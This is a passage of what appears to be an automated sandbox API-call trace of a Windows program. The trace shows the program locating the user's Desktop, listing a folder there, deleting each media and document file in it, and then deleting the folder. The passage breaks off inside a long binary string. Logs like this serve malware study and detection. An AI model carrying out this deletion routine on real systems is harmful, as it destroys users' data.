Flags=0x0, Size=0xca) returned 0x2416f30 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0166.279] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.279] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0166.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/KU9xovkL1lisorTK5X", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X", lpFilePart=0x8bedfc*="KU9xovkL1lisorTK5X") returned 0x38 [0166.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0166.281] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x")) returned 0x10 [0166.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8baf2140, ftCreationTime.dwHighDateTime=0x1d4d21a, ftLastAccessTime.dwLowDateTime=0xbf7b9390, ftLastAccessTime.dwHighDateTime=0x1d4cda2, ftLastWriteTime.dwLowDateTime=0xbf7b9390, ftLastWriteTime.dwHighDateTime=0x1d4cda2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x59, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0166.281] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8baf2140, ftCreationTime.dwHighDateTime=0x1d4d21a, ftLastAccessTime.dwLowDateTime=0xbf7b9390, ftLastAccessTime.dwHighDateTime=0x1d4cda2, ftLastWriteTime.dwLowDateTime=0xbf7b9390, ftLastWriteTime.dwHighDateTime=0x1d4cda2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x59, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0166.281] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ae31b50, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0xdde86eb0, ftLastAccessTime.dwHighDateTime=0x1d4d4ba, ftLastWriteTime.dwLowDateTime=0xdde86eb0, ftLastWriteTime.dwHighDateTime=0x1d4d4ba, nFileSizeHigh=0x0, nFileSizeLow=0x21c0, dwReserved0=0x59, dwReserved1=0x4, cFileName="6XZNXdmaE.mkv", cAlternateFileName="6XZNXD~1.MKV")) returned 1 [0166.281] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\6XZNXdmaE.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\6xznxdmae.mkv")) returned 1 [0166.282] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd34ced0, ftCreationTime.dwHighDateTime=0x1d4d13a, ftLastAccessTime.dwLowDateTime=0x8ab3bf80, ftLastAccessTime.dwHighDateTime=0x1d4d305, ftLastWriteTime.dwLowDateTime=0x8ab3bf80, ftLastWriteTime.dwHighDateTime=0x1d4d305, nFileSizeHigh=0x0, nFileSizeLow=0x17077, dwReserved0=0x59, dwReserved1=0x4, cFileName="beHl29K.png", cAlternateFileName="")) returned 1 [0166.282] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\beHl29K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\behl29k.png")) returned 1 [0166.283] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92e3f40, ftCreationTime.dwHighDateTime=0x1d4d1a4, ftLastAccessTime.dwLowDateTime=0x155fc340, ftLastAccessTime.dwHighDateTime=0x1d4d185, ftLastWriteTime.dwLowDateTime=0x155fc340, ftLastWriteTime.dwHighDateTime=0x1d4d185, nFileSizeHigh=0x0, nFileSizeLow=0x177b9, dwReserved0=0x59, dwReserved1=0x4, cFileName="ltw3NOHA-IS3VO805PDB.mp3", cAlternateFileName="LTW3NO~1.MP3")) returned 1 [0166.283] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\ltw3NOHA-IS3VO805PDB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\ltw3noha-is3vo805pdb.mp3")) returned 1 [0166.284] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454c71f0, ftCreationTime.dwHighDateTime=0x1d4cc1e, ftLastAccessTime.dwLowDateTime=0x5904d490, ftLastAccessTime.dwHighDateTime=0x1d4cbcd, ftLastWriteTime.dwLowDateTime=0x5904d490, ftLastWriteTime.dwHighDateTime=0x1d4cbcd, nFileSizeHigh=0x0, nFileSizeLow=0x265b, dwReserved0=0x59, dwReserved1=0x4, cFileName="MqJJNCaJeg 6LuKEw7_E.bmp", cAlternateFileName="MQJJNC~1.BMP")) returned 1 [0166.284] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\MqJJNCaJeg 6LuKEw7_E.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\mqjjncajeg 6lukew7_e.bmp")) returned 1 [0166.284] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d919550, ftCreationTime.dwHighDateTime=0x1d4ca30, ftLastAccessTime.dwLowDateTime=0x10263e00, ftLastAccessTime.dwHighDateTime=0x1d4d562, ftLastWriteTime.dwLowDateTime=0x10263e00, ftLastWriteTime.dwHighDateTime=0x1d4d562, nFileSizeHigh=0x0, nFileSizeLow=0x8268, dwReserved0=0x59, dwReserved1=0x4, cFileName="rvZq-S63e7o1A.pps", cAlternateFileName="RVZQ-S~1.PPS")) returned 1 [0166.285] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\rvZq-S63e7o1A.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\rvzq-s63e7o1a.pps")) returned 1 [0166.285] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc43d87f0, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x15af1230, ftLastAccessTime.dwHighDateTime=0x1d4d179, ftLastWriteTime.dwLowDateTime=0x15af1230, ftLastWriteTime.dwHighDateTime=0x1d4d179, nFileSizeHigh=0x0, nFileSizeLow=0xa523, dwReserved0=0x59, dwReserved1=0x4, cFileName="SOnMTtgkgNdRf.avi", cAlternateFileName="SONMTT~1.AVI")) returned 1 [0166.285] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X\\SOnMTtgkgNdRf.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x\\sonmttgkgndrf.avi")) returned 1 [0166.286] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc43d87f0, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x15af1230, ftLastAccessTime.dwHighDateTime=0x1d4d179, ftLastWriteTime.dwLowDateTime=0x15af1230, ftLastWriteTime.dwHighDateTime=0x1d4d179, nFileSizeHigh=0x0, nFileSizeLow=0xa523, dwReserved0=0x59, dwReserved1=0x4, cFileName="SOnMTtgkgNdRf.avi", cAlternateFileName="SONMTT~1.AVI")) returned 0 [0166.286] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0166.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0166.287] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0166.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0166.287] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0166.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0166.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/KU9xovkL1lisorTK5X", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X", lpFilePart=0x8bf658*="KU9xovkL1lisorTK5X") returned 0x38 [0166.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0166.289] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x")) returned 0x10 [0166.289] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KU9xovkL1lisorTK5X", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x70